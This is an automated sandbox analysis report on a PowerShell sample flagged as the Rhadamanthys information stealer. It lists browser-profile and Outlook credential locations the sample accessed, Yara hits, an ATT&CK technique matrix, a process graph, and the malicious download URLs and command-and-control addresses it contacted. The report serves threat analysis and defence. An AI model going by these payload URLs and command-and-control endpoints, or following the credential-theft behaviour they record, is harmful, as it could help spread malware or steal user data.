                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsingJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settingsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser\newtabJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\doomedJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\thumbnailsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2Jump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browserJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\entriesJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
                        Source: Yara matchFile source: Process Memory Space: OpenWith.exe PID: 6960, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 11.3.OpenWith.exe.1bd88071e18.84.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1636622080.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1790719264.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1637295094.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1505528408.000001BD854A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1603758838.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1606697672.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1601304637.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1807031317.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1594385953.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1598054710.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1625351972.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1605446278.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1599122967.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1631177009.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1604550057.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1835330246.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1622398648.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1630915907.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1610447240.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1623646235.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1592648399.000001BD88031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1595094361.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1611340042.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1603435540.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1596720432.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1612017140.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1593833995.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1623171299.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1614239162.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1594138733.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1614513286.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1625054748.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1665607668.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1610863973.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1604127571.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1656743401.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1615770138.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1597744056.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000003.1489116263.00000000030E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1533595393.000000001C0C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1596995655.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1601020298.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1662849713.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1607422599.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1592648399.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1605580653.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1655729634.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1600689319.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1594826093.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1595345338.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1630028343.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1596030593.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1596532747.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1616130125.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1613817370.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1612242561.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1607767904.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E956B50 bind,WSAGetLastError,closesocket,3_2_00007FF79E956B50
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E956860 bind,listen,WSAGetLastError,closesocket,3_2_00007FF79E956860
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 14_2_00000203FE6CCDF4 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,14_2_00000203FE6CCDF4

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        Abuse Elevation Control Mechanism                        		1
                        Disable or Modify Tools                        		1
                        OS Credential Dumping                        		1
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		2
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts11
                        Native API                        		1
                        Registry Run Keys / Startup Folder                        		1
                        DLL Side-Loading                        		11
                        Deobfuscate/Decode Files or Information                        		21
                        Input Capture                        		14
                        File and Directory Discovery                        		Remote Desktop Protocol21
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts12
                        Command and Scripting Interpreter                        		Logon Script (Windows)412
                        Process Injection                        		1
                        Abuse Elevation Control Mechanism                        		1
                        Credentials in Registry                        		27
                        System Information Discovery                        		SMB/Windows Admin Shares1
                        Email Collection                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts3
                        PowerShell                        		Login Hook1
                        Registry Run Keys / Startup Folder                        		3
                        Obfuscated Files or Information                        		NTDS131
                        Security Software Discovery                        		Distributed Component Object Model21
                        Input Capture                        		2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Software Packing                        		LSA Secrets41
                        Virtualization/Sandbox Evasion                        		SSHKeylogging13
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading                        		Cached Domain Credentials2
                        Process Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
                        Masquerading                        		DCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                        Virtualization/Sandbox Evasion                        		Proc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529309 Sample: test.ps1 Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 62 rocketdocs.lol 2->62 64 bg.microsoft.map.fastly.net 2->64 66 2 other IPs or domains 2->66 86 Suricata IDS alerts for network traffic 2->86 88 Found malware configuration 2->88 90 Antivirus / Scanner detection for submitted sample 2->90 92 15 other signatures 2->92 10 regsvr32.exe 1 2 2->10         started        13 powershell.exe 14 21 2->13         started        17 regsvr32.exe 2->17         started        signatures3 process4 dnsIp5 108 Sets debug register (to hijack the execution of another thread) 10->108 19 OpenWith.exe 10->19         started        76 bemostake.space 188.114.96.3, 443, 49716 CLOUDFLARENETUS European Union 13->76 78 rocketdocs.lol 188.114.97.3, 443, 49737 CLOUDFLARENETUS European Union 13->78 56 C:\Users\user\Desktop\utox_x86_x64.exe, PE32+ 13->56 dropped 58 C:\Users\Public\ajbs50ul.bat, PE32+ 13->58 dropped 110 Found many strings related to Crypto-Wallets (likely being stolen) 13->110 112 Drops PE files to the user root directory 13->112 114 Powershell creates an autostart link 13->114 116 Powershell drops PE file 13->116 23 ajbs50ul.bat 1 13->23         started        26 utox_x86_x64.exe 1 36 13->26         started        28 conhost.exe 13->28         started        80 185.196.9.174 SIMPLECARRIERCH Switzerland 17->80 82 8.8.8.8 GOOGLEUS United States 17->82 118 System process connects to network (likely due to code injection or exploit) 17->118 file6 signatures7 process8 dnsIp9 68 147.45.126.71, 3752, 49819 FREE-NET-ASFREEnetEU Russian Federation 19->68 94 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->94 96 Tries to steal Mail credentials (via file / registry access) 19->96 98 Found many strings related to Crypto-Wallets (likely being stolen) 19->98 106 2 other signatures 19->106 30 rekeywiz.exe 19->30         started        34 wmpnscfg.exe 19->34         started        36 rekeywiz.exe 19->36         started        54 C:\Users\user\AppData\Roaming\4smg.ini, PE32+ 23->54 dropped 100 Multi AV Scanner detection for dropped file 23->100 102 Suspicious powershell command line found 23->102 104 Found direct / indirect Syscall (likely to bypass EDR) 23->104 38 powershell.exe 37 23->38         started        40 regsvr32.exe 23->40         started        70 104.223.122.15 ASN-QUADRANET-GLOBALUS United States 26->70 72 192.168.2.7, 33445, 3752, 443 unknown unknown 26->72 74 23 other IPs or domains 26->74 file10 signatures11 process12 file13 60 C:\Users\user\AppData\Roaming\oSyU.ini, PE32+ 30->60 dropped 122 Suspicious powershell command line found 30->122 42 powershell.exe 30->42         started        45 regsvr32.exe 30->45         started        124 Writes to foreign memory regions 34->124 126 Allocates memory in foreign processes 34->126 47 dllhost.exe 34->47         started        128 Loading BitLocker PowerShell Module 38->128 50 conhost.exe 38->50         started        signatures14 process15 dnsIp16 120 Loading BitLocker PowerShell Module 42->120 52 conhost.exe 42->52         started        84 46.29.238.96 EUROTELECOM-ASRU Russian Federation 47->84 signatures17 process18

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        test.ps124%ReversingLabsScript-PowerShell.Trojan.PShell
                        test.ps1100%AviraTR/PShell.Dldr.VPA

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\Public\ajbs50ul.bat63%ReversingLabsWin64.Spyware.Rhadamanthys
                        C:\Users\user\AppData\Roaming\4smg.ini12%ReversingLabs
                        C:\Users\user\AppData\Roaming\oSyU.ini46%ReversingLabsWin64.Packed.Generic
                        C:\Users\user\Desktop\utox_x86_x64.exe0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                        https://go.micro0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        https://aka.ms/pscore680%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bemostake.space
                        		188.114.96.3
                        		truefalse
                          		unknown
                          bg.microsoft.map.fastly.net
                          		199.232.210.172
                          		truefalse
                            		unknown
                            rocketdocs.lol
                            		188.114.97.3
                            		truefalse
                              		unknown
                              241.42.69.40.in-addr.arpa
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wmtrue
                                  		unknown
                                  https://rocketdocs.lol/utox_x86.exefalse
                                    		unknown
                                    https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exefalse
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1541187527.0000018C1E0B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1541187527.0000018C1E1F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://discord.comOpenWith.exe, 0000000B.00000003.1635591198.000001BD877F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmptrue
                                          		unknown
                                          https://go.micropowershell.exe, 00000001.00000002.1462792465.0000018C0EC72000.00000004.00000800.00020000.00000000.sdmptrue
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.microsoft.copowershell.exe, 00000001.00000002.1550976753.0000018C260CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmpfalse
